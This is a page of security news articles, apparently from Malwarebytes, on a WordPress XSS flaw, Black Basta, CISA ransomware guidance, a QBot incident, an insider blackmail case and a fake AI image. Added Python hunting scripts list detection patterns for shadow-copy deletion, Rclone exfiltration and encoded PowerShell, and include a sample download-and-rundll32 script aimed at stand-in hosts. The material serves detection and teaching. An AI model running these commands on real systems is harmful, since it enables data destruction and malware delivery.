IT NEWS

“Beautiful Cookie Consent Banner” WordPress plugin vulnerability: Update now!

WordPress plugins are under fire once more, and you’re advised to update your copy of Beautiful Cookie Consent Banner as soon as possible. The plugin, which is installed on more than 40,000 sites, is the target of what researchers call a “bizarre campaign” that has been active since at least February 5 of this year.

The plugin is designed to present users with a cookie banner “without loading any external resources from third parties”. Sadly the cookie has crumbled with a flaw leaving sites open to the possibility of rogue JavaScript abuse.

The flaw was patched back in January, but given how long some site owners leave updates, it will take a while for this one to settle down. The clearest sign of that lag is that, despite the fix being available, attacks are still in full flow. Researchers have observed:

3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023.

The exploit is a cross-site scripting (XSS) attack, which injects malicious script into an otherwise benign website. Most XSS attacks are reflected: the malicious code is not retained by the site, so they only work if a victim is tricked into clicking a doctored link. The vulnerability in Beautiful Cookie Consent Banner allows the more dangerous stored XSS, in which the attacker causes the site to persist the malicious code and serve it to every visitor.

The potential for mischief and mayhem with this kind of compromise is large. Perhaps someone could use scripts to redirect visitors to malware, or phishing pages, or even create malicious admin users. Maybe the rogue admin could add a phishing login page to the website itself, without the real admins knowing about it.

What’s interesting with this one, and perhaps why it’s being tagged as “bizarre”, is that the attack is misconfigured with attacks containing a “partial payload”. In essence, bits of JavaScript code are missing. As the researchers put it, the misconfigured exploit…

…expects a customised payload, and the attacker has simply failed to provide one.

Even so, they note that even in its misconfigured state it still has the potential to corrupt the configuration of the plugin so it will no longer work as expected. There is also the possibility of the individual(s) responsible adding in a functional payload at a later date.

The latest version of the plugin is 2.10.2; anything below it is at risk of attack. Upgrading to a patched version will also repair any alterations an attack has made to the plugin’s settings. If you think you might be at risk, or you’re unsure which version you’re running, now is the time to visit the plugin’s WordPress page and check whether an update is required.

Attacks are ongoing, and will likely continue. Numbers have ramped up dramatically over the past month, so it would be best to lock your site plugins down now. In fact, it would probably be a good idea to check the update status of all of your site plugins. Why wait until you see the name of something you use appearing in a news article next month when you can get one step ahead of the game right now?

Keeping WordPress safe

The following preventative maintenance could save you a lot of trouble:

  • Update existing plugins. If you use WordPress you can check if you have any plugins that need updating by logging in to your site and going to Dashboard > Updates. (The Themes and Plugins menu items will also have red circles next to them if any need updating.) Update everything.
  • Turn on automatic updates for plugins. By default, WordPress does not update plugins automatically. You can enable this on a per-plugin basis by going to the Plugins screen and clicking Enable auto-updates next to each plugin.
  • Remove unsupported plugins. Go to the Plugins screen and click View details for each plugin. This screen shows you the last version of WordPress the plugin was tested with, and when it was last updated. It will also display an alert if it thinks the plugin is no longer supported.
  • Remove unnecessary plugins. Check out how many plugins and themes you have installed on your site. Do you need them all? Can any of them be removed or replaced? Generally, fewer is better.

If you can’t make enough time available to keep on top of theme and plugins, it might be a good time to accept that you don’t need the risk and hand the job to an agency or hosting company.


Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Rheinmetall attacked by BlackBasta ransomware

On Friday May 19, 2023, the German arms producer Rheinmetall acknowledged a cyber incident at one of its subsidiaries in the private sector. The BlackBasta ransomware group has since claimed responsibility for the attack on its leak site.

Entry for Rheinmetall on BlackBasta leak site

Rheinmetall’s main activities are in the automobile industry and weapons manufacturing, and it describes itself as one of the world’s largest manufacturers of military vehicles and ammunition.

The company said the attack did not affect production in the arms division, but German media is reporting that the attack was not limited to one subsidiary.

A spokesman for the Central and Contact Point Cybercrime (ZAC NRW) at the Cologne public prosecutor’s office confirmed in the early evening that it was aware of the incident, but was unable to say how severe the attack was while the investigation is ongoing.

Although BlackBasta is believed to be largely based in a Russian-speaking country, the attack is unlikely to have been directed at the arms industry as such, despite the ongoing conflict between Russia and Ukraine. BlackBasta’s main objective is to find financially attractive targets. And as we noted in our report on ransomware in Germany, in the last year Black Basta has shown a liking for targets in Germany, and conducts attacks there far more frequently than in the UK or France.

Only LockBit—the preeminent global ransomware threat—has more known attacks in Germany in the last year.

Monthly ransomware attacks in Germany with LockBit and Black Basta highlighted, April 2022 – March 2023

BlackBasta is not very different from other ransomware groups in the way it operates. Like many others, its attacks frequently begin with initial access gained through phishing. A typical attack might start with an email containing a malicious document in a zip file. Upon extraction, the document installs the Qakbot banking trojan to create backdoor access and deploy SystemBC, which sets up an encrypted connection to a command and control server. From there, Cobalt Strike is installed for network reconnaissance and to distribute additional tools.

As is the overarching trend for ransomware groups these days, Black Basta’s primary goal is to steal data so that it can hold the threat of leaking it over its victims. The data is generally stolen using the command line program Rclone, which filters and copies specific files to a cloud service. After the data is copied, the ransomware encrypts files and gives them the “.basta” extension, erases volume shadow copies, and drops a ransom note named readme.txt on affected devices. Attackers using Black Basta may be active on a victim’s network for two to three days before running their ransomware.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


CISA updates ransomware guidance

The Cybersecurity and Infrastructure Security Agency (CISA) has updated its #StopRansomware guide to account for the fact that ransomware actors have accelerated their tactics and techniques since the original guide was released in September of 2020.

The #StopRansomware guide is set up as a one-stop resource to help organizations reduce the risk of ransomware incidents through best practices to detect, prevent, respond, and recover from them, including step-by-step approaches to address potential attacks.

Specifically, the agency added:

  • Recommendations for preventing common initial infection vectors.
  • Updated recommendations to address cloud backups and zero trust architecture (ZTA).
  • Threat hunting tips for detection and analysis of ransomware actors.

Since the CISA list of recommendations is huge we will focus on the new points, with links to further Malwarebytes resources, and add our own set of recommendations at the end.

Updated CISA guidance

  • Limit the use of RDP and other remote desktop services. If RDP is necessary, apply best practices. Threat actors often gain initial access to a network through exposed and poorly secured remote services, and later traverse the network using the native Windows RDP client. Threat actors also often gain access by exploiting virtual private networks (VPNs) or using compromised credentials.
  • Implement phishing-resistant multi-factor authentication (MFA) for all services, particularly for email, VPNs, and accounts that access critical systems. Escalate to senior management upon discovery of systems that do not allow MFA, systems that do not enforce MFA, and any users who are not enrolled with MFA.
  • Consider employing password-less MFA that replaces passwords with two or more verification factors (e.g., a fingerprint, facial recognition, a device PIN, or a cryptographic key).
  • Consider subscribing to services that monitor the dark web for compromised credentials.
  • Create policies to include cybersecurity awareness training about advanced forms of social engineering for personnel that have access to your network. Training should include tips on being able to recognize illegitimate websites and search results. It is also important to repeat security awareness training regularly to keep your staff informed and vigilant.
  • Consider using a multi-cloud solution to avoid vendor lock-in for cloud-to-cloud backups in case all accounts under the same vendor are impacted.
  • Implement a zero trust architecture (ZTA) to prevent unauthorized access to data and services. Make access control enforcement as granular as possible. ZTA assumes a network is compromised and provides a collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per request access decisions in information systems and services.
  • Employ logical or physical means of network segmentation by implementing ZTA and separating various business units or departmental IT resources within your organization and maintain separation between IT and operational technology.

CISA considers the following to be advanced forms of social engineering:

For organizations that have their own threat hunters and do not use an external Managed Detection and Response (MDR) service, CISA added the following points for enterprise and cloud environments.

For enterprise environments

  • Newly created Active Directory accounts or accounts with escalated privileges, and recent activity related to privileged accounts such as Domain Admins.
  • Anomalous VPN device logins or other suspicious logins.
  • Endpoint modifications that may impair backups, shadow copy, disk journaling, or boot configurations. Look for anomalous usage of built-in Windows tools such as bcdedit.exe, fsutil.exe (deletejournal), vssadmin.exe, wbadmin.exe, and wmic.exe (shadowcopy or shadowstorage). Misuse of these tools is a common ransomware technique to inhibit system recovery.
  • Signs of the presence of Cobalt Strike beacon/client. Cobalt Strike is a commercial penetration testing software suite. Malicious actors often name Cobalt Strike Windows processes with the same names as legitimate Windows processes to obfuscate their presence and complicate investigations.
  • Signs of any unexpected usage of remote monitoring and management (RMM) software (including portable executables that are not installed). RMM software is commonly used by malicious actors to maintain persistence.
  • Any unexpected PowerShell execution or use of PsTools suite.
  • Signs of enumeration of AD and/or LSASS credentials being dumped (e.g., Mimikatz or NTDSutil.exe).
  • Signs of unexpected endpoint-to-endpoint (including servers) communications.
  • Potential signs of data being exfiltrated from the network. Common tools for data exfiltration include Rclone, Rsync, various web-based file storage services (also used by threat actors to implant malware/tools on the affected network), and FTP/SFTP.
  • Newly created services, unexpected scheduled tasks, unexpected software installed, etc.
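The list above names the tools, but a hunt needs them turned into matching logic. The following Python script is an added example, not from CISA’s guide and not Malwarebytes code: it runs the recovery-inhibition, exfiltration, PsTools and encoded-PowerShell checks from the enterprise list over a handful of constructed process-creation events, and separately flags the “.basta” extension and readme.txt note that the Black Basta write-up earlier on this page describes. The event field names and the sample hosts are assumptions; the substance is the command-line patterns and the per-host ranking, which is what keeps a lone vssadmin call by an administrator from looking like a ransomware run.

```python
"""Hunt constructed Windows process-creation and file-write events for the
recovery-inhibition, exfiltration and tooling indicators listed above."""
import re
from collections import defaultdict

# Constructed sample telemetry. The field layout is an assumption for this
# example, not any vendor's schema; adapt the keys to your EDR/SIEM export.
PROCESS_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "cmdline": "cmd.exe /c whoami /all"},
    {"host": "ws01", "parent": "cmd.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws01", "parent": "cmd.exe", "cmdline": "bcdedit /set {default} recoveryenabled No"},
    {"host": "fs02", "parent": "svchost.exe", "cmdline": "vssadmin.exe list shadows"},  # benign: no delete
    {"host": "fs02", "parent": "cmd.exe",
     "cmdline": "rclone.exe copy \\\\fs02\\finance remote:bucket --max-age 30d"},
    {"host": "dc01", "parent": "services.exe", "cmdline": "PSEXESVC.exe"},
    {"host": "ws07", "parent": "wscript.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
]
FILE_EVENTS = [
    {"host": "fs02", "path": "\\\\fs02\\finance\\Q1.xlsx.basta"},
    {"host": "fs02", "path": "\\\\fs02\\finance\\Q2.xlsx.basta"},
    {"host": "fs02", "path": "\\\\fs02\\finance\\readme.txt"},
    {"host": "ws01", "path": "C:\\Users\\alice\\notes.txt"},
]

# (category, pattern) pairs. Match on the full command line rather than the
# image name, so a renamed copy of the binary is still caught when the
# arguments are the tell-tale part.
PROCESS_RULES = [
    ("inhibit_recovery", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("inhibit_recovery", re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("inhibit_recovery", re.compile(
        r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("inhibit_recovery", re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("inhibit_recovery", re.compile(r"\bfsutil(\.exe)?\s+usn\s+deletejournal", re.I)),
    ("exfil_tool", re.compile(r"\brclone(\.exe)?\b", re.I)),
    ("pstools", re.compile(r"\bpsex(ec|esvc)(64)?(\.exe)?\b", re.I)),
    ("encoded_powershell", re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)),
]


def hunt_processes(events):
    """Return (host, category, cmdline) for every event matching a rule."""
    hits = []
    for ev in events:
        for category, pattern in PROCESS_RULES:
            if pattern.search(ev["cmdline"]):
                hits.append((ev["host"], category, ev["cmdline"]))
                break  # one finding per event is enough for triage
    return hits


def hunt_files(events, extension=".basta", note_name="readme.txt"):
    """Flag files carrying the ransomware extension or the ransom-note name."""
    hits = []
    for ev in events:
        path = ev["path"].lower()
        if path.endswith(extension):
            hits.append((ev["host"], "ransom_extension", ev["path"]))
        elif path.rsplit("\\", 1)[-1] == note_name:
            hits.append((ev["host"], "ransom_note", ev["path"]))
    return hits


def prioritise(hits):
    """Rank hosts by how many distinct indicator categories they triggered.
    A single vssadmin call may be an admin; a host with recovery inhibition
    plus an exfiltration tool plus encrypted-looking files is an incident."""
    categories = defaultdict(set)
    for host, category, _ in hits:
        categories[host].add(category)
    ranked = [(host, sorted(cats)) for host, cats in categories.items()]
    return sorted(ranked, key=lambda item: (-len(item[1]), item[0]))


if __name__ == "__main__":
    findings = hunt_processes(PROCESS_EVENTS) + hunt_files(FILE_EVENTS)
    for host, cats in prioritise(findings):
        print(f"{host}: {', '.join(cats)}")
```

On the constructed input, fs02 rises to the top because it combines Rclone with the ransomware extension and note, while ws01, dc01 and ws07 each trip a single category and are worth a look but not an all-hands. The ordering is the point: these tools are all legitimate on their own, and it is the combination on one host within a short window that separates an administrator from an intruder.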

For cloud environments

  • Enable tools to detect and prevent modifications to IAM, network security, and data protection resources.
  • Use automation to detect common issues (e.g., disabling features, introduction of new firewall rules) and take automated actions as soon as they occur. For example, if a new firewall rule is created that allows open traffic (0.0.0.0/0), an automated action can be taken to disable or delete this rule and send notifications to the user that created it as well as the security team for awareness. This will help avoid alert fatigue and allow security personnel to focus on critical issues.
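As an added example that is not part of CISA’s guide, here is the automated action from the last bullet written out in Python: evaluate a batch of newly created ingress rules, disable any that open non-web ports to the world, and name who gets notified. The rule dictionaries and the allow-list of public ports are assumptions for the example (each cloud provider has its own API and schema). One practitioner caveat is built in: a naive check for the literal string 0.0.0.0/0 is bypassed by splitting the range into 0.0.0.0/1 and 128.0.0.0/1, so the example treats any sufficiently broad prefix as open.

```python
"""Evaluate newly created ingress rules and emit the automated remediation
described above: disable world-open rules and notify the creator and the
security team."""
import ipaddress

# Constructed sample of "new rule" events. The dict shape is an assumption for
# this example, not any provider's API.
NEW_RULES = [
    {"id": "sgr-001", "proto": "tcp", "from_port": 443, "to_port": 443, "cidr": "0.0.0.0/0", "created_by": "deploy-bot"},
    {"id": "sgr-002", "proto": "tcp", "from_port": 3389, "to_port": 3389, "cidr": "0.0.0.0/0", "created_by": "alice"},
    {"id": "sgr-003", "proto": "-1", "from_port": 0, "to_port": 65535, "cidr": "::/0", "created_by": "bob"},
    {"id": "sgr-004", "proto": "tcp", "from_port": 22, "to_port": 22, "cidr": "0.0.0.0/1", "created_by": "carol"},
    {"id": "sgr-005", "proto": "tcp", "from_port": 22, "to_port": 22, "cidr": "10.20.0.0/16", "created_by": "carol"},
]

# Assumption: only the public web ports may legitimately be world-reachable.
ALLOWED_PUBLIC = {("tcp", 80), ("tcp", 443)}
# A literal "== 0.0.0.0/0" check is bypassed with 0.0.0.0/1 plus 128.0.0.0/1,
# so treat any prefix at least this broad as "open to the world".
OPEN_PREFIX_LIMIT = {4: 8, 6: 32}


def is_world_open(cidr):
    net = ipaddress.ip_network(cidr, strict=False)
    return net.prefixlen <= OPEN_PREFIX_LIMIT[net.version]


def evaluate(rule):
    """Return a remediation action for a rule, or None if it is acceptable."""
    if not is_world_open(rule["cidr"]):
        return None
    proto = rule["proto"]
    if proto in ("tcp", "udp"):
        ports = range(rule["from_port"], rule["to_port"] + 1)
        if all((proto, p) in ALLOWED_PUBLIC for p in ports):
            return None
        exposure = f"{proto}/{rule['from_port']}-{rule['to_port']}"
    else:
        exposure = "all protocols"  # "-1" style rules cover every protocol
    return {
        "rule_id": rule["id"],
        "action": "disable",
        "reason": f"{exposure} open from {rule['cidr']}",
        "notify": [rule["created_by"], "security-team"],
    }


def remediate(rules):
    """Actions for every offending rule, in the order the rules arrived."""
    actions = []
    for rule in rules:
        action = evaluate(rule)
        if action is not None:
            actions.append(action)
    return actions


if __name__ == "__main__":
    for action in remediate(NEW_RULES):
        print(action["rule_id"], action["action"], action["reason"], "->", action["notify"])
```

Wire evaluate() to your provider’s rule-created event stream and replace the "disable" string with the real API call; keep the allow-list small and reviewed, because every entry in it is a port you have decided the whole internet may reach.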

Malwarebytes’ tips to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


Webinar alert: How Coffee County Schools safeguards 7500 students and 1200 staff

We’re excited to announce that our much-anticipated 4th edition of the Byte Into Security webinar series is right around the corner. Scheduled for May 31st at 10:00AM PST/1:00pm EST, this session is a goldmine for those facing the unique challenges of K-12 cybersecurity. The webinar is free, and you can register right now!

We’re bringing Logan Evans, Director of Information Systems at Coffee County Schools in Georgia, into conversation with Marcin Kleczynski, CEO of Malwarebytes. Together, they will explore the intricacies of maintaining robust cybersecurity for a rural school district with 7500 students and 1200 staff, managed by a small but mighty team of 10 IT and security professionals.

Here’s what you can expect from this dialogue:

  • An in-depth understanding of the hurdles faced by Coffee County Schools, in particular a stringent security audit.
  • How Malwarebytes’ Nebula platform has eased the management of cybersecurity for Logan and his team.
  • The role and value of machine learning in the school’s cybersecurity strategy.
  • Tips for balancing a secure environment that remains accessible to end-users.
  • Strategies for overcoming the challenge of hiring IT and security professionals in the education sector.
  • An emphasis on why security awareness training is essential for school districts.

You’ll also get a chance to learn about the cybersecurity threats looming over educational institutions and how to counteract them. 

We look forward to welcoming you to another exciting episode of the Byte Into Security webinar series. Don’t miss out on the chance to get an insider’s perspective on K-12 cybersecurity!

Register Here 

Tracking down a trojan: An inside look at threat hunting in a corporate network

At Malwarebytes, we talk a lot about the importance of threat hunting for SMBs, and with good reason. When a threat actor breaches a network, they don’t attack right away: the median time between system compromise and detection is 21 days.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed.

Threat hunting helps find and remediate highly-obfuscated threats like these that quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

The bad news for small-to-medium sized businesses (SMBs): Manually intensive and costly threat-hunting tools usually restrict this practice to larger organizations with an advanced cybersecurity model and a well-staffed security operations center (SOC).

That’s where Malwarebytes Managed Detection and Response (MDR) comes in.

Malwarebytes MDR is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack.

But talk is cheap: let’s look at a real case where Malwarebytes MDR helped a company detect and respond to the potent banking Trojan known as QBot.

The Incident

On a date left undisclosed for security reasons, a reputable oil and gas company we’ll refer to as Company 1 experienced an intrusion in their network. The culprit was Qakbot (also known as QBot).

QBot is notorious for its abilities to steal sensitive information, like login credentials, financial data, and personal information, and even create backdoors for additional malware to infiltrate the compromised system. What’s more, it also facilitates remote access to the compromised machines.

QBot has recently been observed being distributed as part of a phishing campaign using PDFs and Windows Script Files (WSF).


The QBot campaign illustrated (Source: Jerome Segura | Malwarebytes Labs)

QBot attacks start with a reply-chain phishing email, when threat actors reply to a chain of emails with a malicious link or attachment.


A sample reply-chain phishing email in French, carrying a PDF attachment disguised as a cancellation letter. (Source: BleepingComputer)

Once someone in the email chain opens the attached PDF, they see a message saying, “This document contains protected files, to display them, click on the ‘open’ button.” Clicking the button downloads a ZIP file containing the WSF script.


The heavily obfuscated script contains a mix of JScript and VBScript code that, when run, launches PowerShell to download the QBot DLL from a list of hardcoded URLs. The script tries each URL in turn until a file is downloaded to the Windows Temp folder (%TEMP%) and executed.

Once QBot runs, it issues a PING command to check for an internet connection. It then injects itself into wermgr.exe, the legitimate Windows Error Reporting manager, so that it runs quietly in the background under a trusted process name.

The Infection

The initial infection at Company 1 was traced to a laptop on their network. The Qakbot malware used a Windows Script File (WSF), executed by WSCRIPT.EXE, to launch a Base64-encoded PowerShell command.


The Process Graph tile under the Suspicious Activity page in Nebula shows a visual representation of the files or processes touched by the suspicious activity.


Clicking on the node to view more details, we see that WSCRIPT.EXE was used to execute the Windows Script File, which spawned an instance of PowerShell executing a Base64-encoded command.


Node detail showing malicious encoded PowerShell script.

This script was designed to be patient and stealthy.

It first waited 4 seconds before building an array of URLs, presumably pointing at attacker-controlled hosts. The malware then attempted to download a file from each URL, checking each file for a minimum size of 100,000 bytes, a sanity check that the response carried a real payload rather than an empty or error response. If a download failed, the script waited another 4 seconds before moving on to the next URL.

The downloaded files were executed using the RUNDLL32.EXE Windows utility, which was invoked from the PowerShell instance. This allowed the downloaded file, dubbed “FreeformOzarkite.marseillais,” to load and execute its malicious payload.


RUNDLL32.EXE was invoked from the previous instance of PowerShell to execute a malicious payload or module that is stored in the file “FreeformOzarkite.marseillais” in the temporary folder of the infected user. 
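The encoded PowerShell is the pivot point of this chain, and the node detail above is only useful once you decode it. The following Python script is an added example, not from Malwarebytes’ Nebula platform and not taken from the incident: it pulls the -EncodedCommand argument out of a process-creation command line, decodes it the way powershell.exe does (base64 over UTF-16LE), and scores the result for the behaviours described above (the sleep, the URL array, the download, the 100,000-byte size check, the drop into %TEMP% and the rundll32 launch). The sample script and the hypothetical file name it uses are constructed for the example; it points at .invalid domains and is never executed, it only serves as input for the decoder.

```python
"""Decode a -EncodedCommand argument from a process-creation event and score
the decoded script for the behaviours described in the incident above."""
import base64
import binascii
import re

# Constructed sample: a script skeleton shaped like the behaviour described
# above (sleep, URL array, download, size check, rundll32 launch from %TEMP%).
# It points at .invalid domains and is never executed; it only exists so the
# decoder has realistic input. The file name is hypothetical.
SAMPLE_SCRIPT = (
    "Start-Sleep 4; "
    "$u = @('http://a.example.invalid/p1', 'http://b.example.invalid/p2'); "
    "foreach ($x in $u) { try { "
    "Invoke-WebRequest $x -OutFile \"$env:TEMP\\Freeform.dat\"; "
    "if ((Get-Item \"$env:TEMP\\Freeform.dat\").Length -ge 100000) { "
    "rundll32 \"$env:TEMP\\Freeform.dat\",Entry; break } } "
    "catch { Start-Sleep 4 } }"
)


def encode_powershell(script):
    """Produce what powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines (not real telemetry).
SAMPLE_EVENT = "powershell.exe -nop -w hidden -enc " + encode_powershell(SAMPLE_SCRIPT)
BENIGN_EVENT = "powershell.exe -enc " + encode_powershell("Get-Date; Start-Sleep 1")

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Each indicator maps to one behaviour from the incident write-up.
INDICATORS = {
    "sleep_before_action": re.compile(r"start-sleep", re.I),
    "url_array": re.compile(r"@\(\s*['\"]https?://", re.I),
    "downloader": re.compile(r"invoke-webrequest|downloadfile|net\.webclient|\biwr\b", re.I),
    "size_check": re.compile(r"\.length\s*-g[et]\s*\d{5,}", re.I),
    "temp_drop": re.compile(r"\$env:temp|\\temp\\", re.I),
    "rundll32_launch": re.compile(r"\brundll32\b", re.I),
}


def decode_encoded_command(cmdline):
    """Return the decoded script, or None if there is no usable -enc argument."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (ValueError, binascii.Error):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyse_event(cmdline, threshold=3):
    """Score a command line; 'suspicious' when enough behaviours co-occur."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"encoded": False, "indicators": [], "suspicious": False}
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    return {"encoded": True, "indicators": hits,
            "suspicious": len(hits) >= threshold, "decoded": decoded}


if __name__ == "__main__":
    for event in (SAMPLE_EVENT, BENIGN_EVENT, "cmd.exe /c whoami /all"):
        result = analyse_event(event)
        print(result["suspicious"], result["indicators"])
```

Run stand-alone, analyse_event(SAMPLE_EVENT) reports all six indicators and flags the event, while the benign event with a single Start-Sleep is decoded but not flagged. In practice it is the decoded script, not the base64 blob, that you want indexed in your SIEM: the same script re-encodes to a completely different string after a trivial whitespace change, so hashing or matching the encoded form buys very little.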

The Malicious DLL

A specific DLL file, zibkwyxdtpcrqshpuqkoomcoba.dll, was identified as one of the malicious components loaded by the Qakbot infection.


Node detail showing the malicious DLL is executed (zibkwyxdtpcrqshpuqkoomcoba.dll).

Analysis of this DLL revealed several malicious capabilities, including:

  • Code injection into other processes.
  • Harvesting of sensitive data, like Chrome and Outlook passwords, Wi-Fi passwords, and Bitcoin wallets.
  • Capturing screenshots.
  • Modifying system settings, like disabling the User Account Control (UAC), to make the system more vulnerable to further attacks.
  • Communication with a remote command and control (C&C) server for data exfiltration and remote command execution.

The team also saw system enumeration utilizing WHOAMI.EXE and IPCONFIG.EXE:

  • whoami /all
  • ipconfig /all

Data Exfiltration and Remediation

The malware attempted to send the collected data to a known Qakbot C2 IP address. This is presumably where the stolen data would be accumulated and analyzed by the malicious actors.

However, the Malwarebytes MDR team promptly detected and contained this threat, taking steps such as cleaning the system of the infection, informing Company 1 of the incident, and providing actionable recommendations to prevent future compromises.

Threat hunting with MDR


How Malwarebytes MDR works

Threat hunting is essential for small-and-medium-sized businesses, as attackers can potentially remain undetected for over two weeks after compromising a network.

Unfortunately, threat hunting is complicated and requires a dedicated SOC and seasoned cybersecurity staff, barring most SMBs from utilizing this important security practice. 

In this article, we’ve outlined the significant role that Malwarebytes MDR can play in uncovering, managing, and remediating threats like Qakbot, helping you avoid business disruption and financial loss.

Want to learn more about Malwarebytes MDR and threat hunting? Click the link below for a quote. 

Stop Qbot attacks today

Employee guilty of joining ransomware attack on his own company

A 28-year-old IT security analyst has pleaded guilty to blackmail and to unauthorized access to a computer with intent to commit other offences, and will be convicted accordingly.

It all started when the UK gene and cell therapy company Oxford BioMedica fell victim to a cybersecurity incident on February 27, 2018, involving unauthorized access to part of the company’s computer systems. The intruder notified senior staff members at the company and demanded a ransom. As an IT security analyst at the company, Ashley Liles was tasked with investigating the incident.

He worked alongside colleagues and the police in an attempt to mitigate the incident. But at some point he must have decided to use the circumstances to enrich himself. According to the South East Regional Organised Crime Unit (SEROCU), Liles commenced a separate and secondary attack against the company.

As part of his plan he changed the Bitcoin payment address in the attacker’s emails to the board members to one of his own, and set up an email address very similar to the attacker’s. From that address he began emailing his employer to pressure the company into paying the ransom.

Unfortunately for Liles, a payment was never made and the unauthorized access to the private emails was noticed during the investigation. Due to some poor choices when it came to his own security, the police arrested Liles and searched his home.

The unauthorized access to the emails was traced back to his home address, which gave the police sufficient grounds to seize a computer, a laptop, a phone, and a USB stick. Despite his attempts to wipe the devices, police were able to recover enough data to prove his crimes and establish his direct involvement.

Liles denied any involvement for five years. But on May 17, 2023 during a hearing at Reading Crown Court, he changed his plea to guilty. The case has now been adjourned for sentencing at the same court on July 11, 2023.

While this definitely qualifies as an insider threat, this one seems to have been opportunistic rather than premeditated. The term is often associated with disgruntled employees, but insiders can also be coerced, or simply jump on an opportunity that presents itself, as Liles did. The case emphasizes the need for effective access control policies, even in an emergency. You do not want to widen the scope of an incident by relaxing your access policies in the heat of an investigation.

Access to resources should always be limited to what is needed to get the job done. And incidental access should be revoked when the need is no longer there. We’re not saying that every employee should be treated as a suspect or potential insider threat. That will result in an unworkable situation. But you should have measures in place to limit the damage and find any culprit.


AI generated Pentagon explosion photograph goes viral on Twitter

Twitter’s recent changes to checkmark verification continue to cause chaos, this time in the realm of potentially dangerous misinformation. A checkmarked account claimed to show images of explosions close to important landmarks like the Pentagon. These images quickly went viral despite being AI generated and containing multiple overt errors for anyone looking at the supposed photographs.

How did this happen?

Until recently, the social media routine when an important news story breaks would be as follows:

  • Something happens, and it’s reported on by verified accounts on Twitter
  • This news filters out to non-verified accounts

“Verified” accounts can now be bought by anybody willing to sign up for the $8-a-month Twitter Blue service. There is no real guarantee that a checkmarked video game company, celebrity, or news source is in fact who they claim to be. This new policy has already injected plenty of mayhem into social media: a fake Nintendo account dispensing offensive images and the infamous “Insulin is free” tweet causing a stock dive spring to mind.

People have taken the “anything goes in checkmark land” approach and are running with it.

What’s happening now is:

  • Fake stories are promoted by checkmarked accounts
  • Those stories filter out to non-checkmarked accounts
  • People in search of facts try to find non-checkmarked (but real) journalists and news agencies while ignoring the checkmarked accounts.

This is made more difficult by changes to how Twitter displays replies, as paid accounts “float” to the top of any conversation. As a result, a situation where a checkmarked account goes viral through a combination of real people, genuine “verified” accounts, and those looking to spread misinformation can potentially result in disaster.

In this case, several checkmarked accounts made claims of explosions near the Pentagon and then the White House. 

Bellingcat investigators quickly debunked the imagery for what it is: Poorly done, with errors galore.

Despite how odd the images looked, with no people, mashed up railings, and walls that melt into one another, it made no difference. The visibility of the bogus tweets rocketed and soon there was the possibility of a needless terror-attack panic taking place.

Many US Government, law enforcement, and first responder accounts no longer have a checkmark as they declined to pay for Twitter Blue. Thankfully some have the new grey Government badge, and Arlington County Fire Department was able to confirm that there was no explosion.

What’s interesting about this one is that it highlights how you can post terrible, amateur imagery with no attempt to polish it and enough people will still believe it to make it go viral. In this case, it went viral to the extent that the Pentagon Force Protection Agency had to help debunk it. As Bleeping Computer notes, the PFPA isn’t even verified anymore.

There is no easy answer or collection of tips for avoiding this kind of thing on social media. At least, not on Twitter in its current setup. A once valuable source for breaking, potentially critical warnings about dangerous weather or major incidents simply cannot be trusted as it used to be.

